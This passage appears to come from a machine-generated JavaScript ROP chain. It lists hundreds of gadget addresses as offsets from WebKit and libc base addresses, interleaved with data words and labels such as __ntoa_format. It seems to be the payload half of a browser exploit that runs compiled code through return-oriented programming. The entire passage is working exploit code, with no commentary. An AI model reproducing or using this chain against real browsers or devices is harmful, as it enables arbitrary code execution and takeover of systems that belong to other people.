webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5635:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5637:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+292216, //L5640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+292200, //L5638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5638:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5640:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+292392, //L5643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+292408, //L5644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+292360, //L5641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+292376, //L5642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5641:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5642:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5643:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5644:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+292504, //L5646
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+292488, //L5645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5645:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5646:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+292584, //L5647
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5647:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5649:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+292704, //L5652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+292688, //L5650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5650:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5652:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+292848, //L5655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+292816, //L5653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+292832, //L5654
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5653:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5654:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5655:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+292928, //L5656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5656:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5658:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+293048, //L5661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+293032, //L5659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5659:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5661:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+293208, //L5665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+293176, //L5663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+293192, //L5664
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5662:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5663:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5664:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5665:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+293264, //L5667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5667:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+293392, //L5669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+293408, //L5670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+293376, //L5668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5668:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5669:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5670:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+293568, //L5674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+293536, //L5672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+293552, //L5673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5671:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5672:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5673:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5674:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+293624, //L5676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5676:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+293752, //L5678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+293768, //L5679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+293736, //L5677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5677:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5678:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5679:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+293880, //L5682
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+293848, //L5680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5680:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5681:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5682:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+293984, //L5683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5683:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5685:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+294104, //L5688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+294088, //L5686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5686:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5688:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+294248, //L5691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+294216, //L5689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+294232, //L5690
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5689:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5690:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5691:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+294344, //L5693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5692:
db([4294967264, 4294967295]); // -0x20
set_gadget(libc_base+759608,); //pop rax
//L5693:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+294432, //L5694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5694:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5696:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+294552, //L5699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+294536, //L5697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5697:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5699:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+294696, //L5702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+294664, //L5700
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+294680, //L5701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5700:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5701:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5702:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+294776, //L5703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5703:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5705:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+294896, //L5708
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+294880, //L5706
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5706:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5708:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+295040, //L5711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+295008, //L5709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+295024, //L5710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5709:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5710:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5711:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+295120, //L5712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5712:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5714:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+295240, //L5717
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+295224, //L5715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5715:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5717:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+295384, //L5720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+295352, //L5718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+295368, //L5719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5718:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5719:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5720:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+295464, //L5721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5721:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5723:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+295584, //L5726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+295568, //L5724
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5724:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5726:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+295728, //L5729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+295696, //L5727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+295712, //L5728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5727:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5728:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5729:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L5731:
ropchain+295832, //L5730
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+211272, //__ntoa_format
//L5730:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967208, 4294967295]); // -0x58
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+295960, //L5732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+295992, //L5734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+295976, //L5733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5732:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5733:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5734:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+296096, //L5735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+296112, //L5736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L5735:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5736:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+296232, //L5737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+296216, //L5738
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L5738:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L5737:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+296320, //L5740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+296304, //L5739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5739:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5740:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+296424, //L5741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+296440, //L5742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L5741:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5742:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+296560, //L5743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+296544, //L5744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L5744:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L5743:
db([0, 0]); // 0x0
//__ntoa_long_long:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+296632, //L5746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L5746:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+296696, //L5748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L5748:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+296784, //L5750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5749:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5750:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5751:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+296864, //L5752
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5752:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5754:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L5756:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+297024, //L5759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+297008, //L5757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5757:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5759:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+297184, //L5763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+297136, //L5760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+297152, //L5761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5760:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5761:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5762:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5763:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+297320, //L5765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+297336, //L5766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+297304, //L5764
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5764:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5765:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5766:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+297448, //L5768
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+297496, //L5771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+297464, //L5769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5768:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5769:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5770:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5771:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+297608, //L5772+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+297600, //L5772
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5772:
db([0, 0]); // 0x0
set_gadgets([
ropchain+297624, //L5772+24
ropchain+298688, //L5767
libc_base+764760, //pop rsi
ropchain+297664, //L5773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5773:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5775:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+297784, //L5778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+297768, //L5776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5776:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5778:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+297960, //L5781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+297976, //L5782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+297928, //L5779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+297944, //L5780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5779:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5780:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5781:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5782:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+298072, //L5784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+298056, //L5783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5783:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
